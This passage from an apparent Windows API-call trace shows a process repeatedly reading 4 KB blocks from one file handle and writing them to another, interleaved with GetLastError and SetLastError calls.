returned 0x0 [0101.975] SetLastError (dwErrCode=0x0) [0101.975] GetLastError () returned 0x0 [0101.975] SetLastError (dwErrCode=0x0) [0101.975] GetLastError () returned 0x0 [0101.975] SetLastError (dwErrCode=0x0) [0101.975] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.975] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.975] GetLastError () returned 0x0 [0101.975] SetLastError (dwErrCode=0x0) [0101.975] GetLastError () returned 0x0 [0101.975] SetLastError (dwErrCode=0x0) [0101.976] GetLastError () returned 0x0 [0101.976] SetLastError (dwErrCode=0x0) [0101.976] GetLastError () returned 0x0 [0101.976] SetLastError (dwErrCode=0x0) [0101.976] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.976] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.976] GetLastError () returned 0x0 [0101.976] SetLastError (dwErrCode=0x0) [0101.976] GetLastError () returned 0x0 [0101.976] SetLastError (dwErrCode=0x0) [0101.976] GetLastError () returned 0x0 [0101.977] SetLastError (dwErrCode=0x0) [0101.977] GetLastError () returned 0x0 [0101.977] SetLastError (dwErrCode=0x0) [0101.977] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.977] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.977] GetLastError () returned 0x0 [0101.977] SetLastError (dwErrCode=0x0) [0101.977] GetLastError () returned 0x0 [0101.977] SetLastError (dwErrCode=0x0) [0101.977] GetLastError () returned 0x0 [0101.977] SetLastError (dwErrCode=0x0) [0101.978] GetLastError () returned 0x0 [0101.978] SetLastError (dwErrCode=0x0) [0101.978] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.978] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.978] GetLastError () returned 0x0 [0101.978] SetLastError (dwErrCode=0x0) [0101.978] GetLastError () returned 0x0 [0101.978] SetLastError (dwErrCode=0x0) [0101.978] GetLastError () returned 0x0 [0101.978] SetLastError (dwErrCode=0x0) [0101.978] GetLastError () returned 0x0 [0101.978] SetLastError (dwErrCode=0x0) [0101.979] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.979] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.979] GetLastError () returned 0x0 [0101.979] SetLastError (dwErrCode=0x0) [0101.979] GetLastError () returned 0x0 [0101.979] SetLastError (dwErrCode=0x0) [0101.979] GetLastError () returned 0x0 [0101.979] SetLastError (dwErrCode=0x0) [0101.979] GetLastError () returned 0x0 [0101.979] SetLastError (dwErrCode=0x0) [0101.979] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.979] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.980] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.981] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.981] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.981] GetLastError () returned 0x0 [0101.981] SetLastError (dwErrCode=0x0) [0101.981] GetLastError () returned 0x0 [0101.981] SetLastError (dwErrCode=0x0) [0101.981] GetLastError () returned 0x0 [0101.981] SetLastError (dwErrCode=0x0) [0101.981] GetLastError () returned 0x0 [0101.981] SetLastError (dwErrCode=0x0) [0101.981] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.981] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.981] GetLastError () returned 0x0 [0101.981] SetLastError (dwErrCode=0x0) [0101.981] GetLastError () returned 0x0 [0101.981] SetLastError (dwErrCode=0x0) [0101.982] GetLastError () returned 0x0 [0101.982] SetLastError (dwErrCode=0x0) [0101.982] GetLastError () returned 0x0 [0101.982] SetLastError (dwErrCode=0x0) [0101.982] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.982] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.982] GetLastError () returned 0x0 [0101.982] SetLastError (dwErrCode=0x0) [0101.982] GetLastError () returned 0x0 [0101.982] SetLastError (dwErrCode=0x0) [0101.982] GetLastError () returned 0x0 [0101.982] SetLastError (dwErrCode=0x0) [0101.982] GetLastError () returned 0x0 [0101.982] SetLastError (dwErrCode=0x0) [0101.982] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.982] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.983] GetLastError () returned 0x0 [0101.983] SetLastError (dwErrCode=0x0) [0101.983] GetLastError () returned 0x0 [0101.983] SetLastError (dwErrCode=0x0) [0101.983] GetLastError () returned 0x0 [0101.983] SetLastError (dwErrCode=0x0) [0101.983] GetLastError () returned 0x0 [0101.983] SetLastError (dwErrCode=0x0) [0101.983] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.983] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.983] GetLastError () returned 0x0 [0101.983] SetLastError (dwErrCode=0x0) [0101.983] GetLastError () returned 0x0 [0101.983] SetLastError (dwErrCode=0x0) [0101.983] GetLastError () returned 0x0 [0101.983] SetLastError (dwErrCode=0x0) [0101.983] GetLastError () returned 0x0 [0101.983] SetLastError (dwErrCode=0x0) [0101.983] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.983] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.984] GetLastError () returned 0x0 [0101.984] SetLastError (dwErrCode=0x0) [0101.984] GetLastError () returned 0x0 [0101.984] SetLastError (dwErrCode=0x0) [0101.984] GetLastError () returned 0x0 [0101.984] SetLastError (dwErrCode=0x0) [0101.984] GetLastError () returned 0x0 [0101.984] SetLastError (dwErrCode=0x0) [0101.984] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.984] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.984] GetLastError () returned 0x0 [0101.984] SetLastError (dwErrCode=0x0) [0101.984] GetLastError () returned 0x0 [0101.984] SetLastError (dwErrCode=0x0) [0101.984] GetLastError () returned 0x0 [0101.985] SetLastError (dwErrCode=0x0) [0101.985] GetLastError () returned 0x0 [0101.985] SetLastError (dwErrCode=0x0) [0101.985] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.985] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.985] GetLastError () returned 0x0 [0101.985] SetLastError (dwErrCode=0x0) [0101.985] GetLastError () returned 0x0 [0101.985] SetLastError (dwErrCode=0x0) [0101.985] GetLastError () returned 0x0 [0101.985] SetLastError (dwErrCode=0x0) [0101.985] GetLastError () returned 0x0 [0101.985] SetLastError (dwErrCode=0x0) [0101.985] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.985] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.985] GetLastError () returned 0x0 [0101.986] SetLastError (dwErrCode=0x0) [0101.986] GetLastError () returned 0x0 [0101.986] SetLastError (dwErrCode=0x0) [0101.986] GetLastError () returned 0x0 [0101.986] SetLastError (dwErrCode=0x0) [0101.986] GetLastError () returned 0x0 [0101.986] SetLastError (dwErrCode=0x0) [0101.986] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.086] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.086] GetLastError () returned 0x0 [0102.086] SetLastError (dwErrCode=0x0) [0102.086] GetLastError () returned 0x0 [0102.086] SetLastError (dwErrCode=0x0) [0102.086] GetLastError () returned 0x0 [0102.086] SetLastError (dwErrCode=0x0) [0102.086] GetLastError () returned 0x0 [0102.086] SetLastError (dwErrCode=0x0) [0102.086] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.086] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.087] GetLastError () returned 0x0 [0102.087] SetLastError (dwErrCode=0x0) [0102.087] GetLastError () returned 0x0 [0102.087] SetLastError (dwErrCode=0x0) [0102.087] GetLastError () returned 0x0 [0102.087] SetLastError (dwErrCode=0x0) [0102.087] GetLastError () returned 0x0 [0102.087] SetLastError (dwErrCode=0x0) [0102.087] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.087] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.087] GetLastError () returned 0x0 [0102.087] SetLastError (dwErrCode=0x0) [0102.087] GetLastError () returned 0x0 [0102.087] SetLastError (dwErrCode=0x0) [0102.087] GetLastError () returned 0x0 [0102.087] SetLastError (dwErrCode=0x0) [0102.087] GetLastError () returned 0x0 [0102.087] SetLastError (dwErrCode=0x0) [0102.087] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.088] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.088] GetLastError () returned 0x0 [0102.088] SetLastError (dwErrCode=0x0) [0102.088] GetLastError () returned 0x0 [0102.088] SetLastError (dwErrCode=0x0) [0102.088] GetLastError () returned 0x0 [0102.088] SetLastError (dwErrCode=0x0) [0102.088] GetLastError () returned 0x0 [0102.088] SetLastError (dwErrCode=0x0) [0102.088] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.088] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.088] GetLastError () returned 0x0 [0102.088] SetLastError (dwErrCode=0x0) [0102.088] GetLastError () returned 0x0 [0102.088] SetLastError (dwErrCode=0x0) [0102.088] GetLastError () returned 0x0 [0102.088] SetLastError (dwErrCode=0x0) [0102.089] GetLastError () returned 0x0 [0102.089] SetLastError (dwErrCode=0x0) [0102.089] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.089] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.089] GetLastError () returned 0x0 [0102.089] SetLastError (dwErrCode=0x0) [0102.089] GetLastError () returned 0x0 [0102.089] SetLastError (dwErrCode=0x0) [0102.089] GetLastError () returned 0x0 [0102.089] SetLastError (dwErrCode=0x0) [0102.089] GetLastError () returned 0x0 [0102.089] SetLastError (dwErrCode=0x0) [0102.089] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.089] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.089] GetLastError () returned 0x0 [0102.089] SetLastError (dwErrCode=0x0) [0102.089] GetLastError () returned 0x0 [0102.090] SetLastError (dwErrCode=0x0) [0102.090] GetLastError () returned 0x0 [0102.090] SetLastError (dwErrCode=0x0) [0102.090] GetLastError () returned 0x0 [0102.090] SetLastError (dwErrCode=0x0) [0102.090] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.090] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.090] GetLastError () returned 0x0 [0102.090] SetLastError (dwErrCode=0x0) [0102.090] GetLastError () returned 0x0 [0102.090] SetLastError (dwErrCode=0x0) [0102.090] GetLastError () returned 0x0 [0102.090] SetLastError (dwErrCode=0x0) [0102.090] GetLastError () returned 0x0 [0102.090] SetLastError (dwErrCode=0x0) [0102.090] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.090] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.091] GetLastError () returned 0x0 [0102.091] SetLastError (dwErrCode=0x0) [0102.091] GetLastError () returned 0x0 [0102.091] SetLastError (dwErrCode=0x0) [0102.091] GetLastError () returned 0x0 [0102.091] SetLastError (dwErrCode=0x0) [0102.091] GetLastError () returned 0x0 [0102.091] SetLastError (dwErrCode=0x0) [0102.091] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.091] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.091] GetLastError () returned 0x0 [0102.091] SetLastError (dwErrCode=0x0) [0102.091] GetLastError () returned 0x0 [0102.091] SetLastError (dwErrCode=0x0) [0102.091] GetLastError () returned 0x0 [0102.091] SetLastError (dwErrCode=0x0) [0102.091] GetLastError () returned 0x0 [0102.091] SetLastError (dwErrCode=0x0) [0102.091] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.092] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.092] GetLastError () returned 0x0 [0102.092] SetLastError (dwErrCode=0x0) [0102.092] GetLastError () returned 0x0 [0102.092] SetLastError (dwErrCode=0x0) [0102.092] GetLastError () returned 0x0 [0102.092] SetLastError (dwErrCode=0x0) [0102.092] GetLastError () returned 0x0 [0102.092] SetLastError (dwErrCode=0x0) [0102.092] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.092] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.092] GetLastError () returned 0x0 [0102.092] SetLastError (dwErrCode=0x0) [0102.092] GetLastError () returned 0x0 [0102.092] SetLastError (dwErrCode=0x0) [0102.092] GetLastError () returned 0x0 [0102.092] SetLastError (dwErrCode=0x0) [0102.092] GetLastError () returned 0x0 [0102.092] SetLastError (dwErrCode=0x0) [0102.093] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.093] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.093] GetLastError () returned 0x0 [0102.093] SetLastError (dwErrCode=0x0) [0102.093] GetLastError () returned 0x0 [0102.093] SetLastError (dwErrCode=0x0) [0102.093] GetLastError () returned 0x0 [0102.093] SetLastError (dwErrCode=0x0) [0102.093] GetLastError () returned 0x0 [0102.093] SetLastError (dwErrCode=0x0) [0102.093] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.093] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.093] GetLastError () returned 0x0 [0102.093] SetLastError (dwErrCode=0x0) [0102.093] GetLastError () returned 0x0 [0102.094] SetLastError (dwErrCode=0x0) [0102.094] GetLastError () returned 0x0 [0102.094] SetLastError (dwErrCode=0x0) [0102.094] GetLastError () returned 0x0 [0102.094] SetLastError (dwErrCode=0x0) [0102.094] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.094] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.094] GetLastError () returned 0x0 [0102.094] SetLastError (dwErrCode=0x0) [0102.094] GetLastError () returned 0x0 [0102.094] SetLastError (dwErrCode=0x0) [0102.094] GetLastError () returned 0x0 [0102.094] SetLastError (dwErrCode=0x0) [0102.094] GetLastError () returned 0x0 [0102.094] SetLastError (dwErrCode=0x0) [0102.094] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.094] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.095] GetLastError () returned 0x0 [0102.095] SetLastError (dwErrCode=0x0) [0102.095] GetLastError () returned 0x0 [0102.095] SetLastError (dwErrCode=0x0) [0102.095] GetLastError () returned 0x0 [0102.095] SetLastError (dwErrCode=0x0) [0102.095] GetLastError () returned 0x0 [0102.095] SetLastError (dwErrCode=0x0) 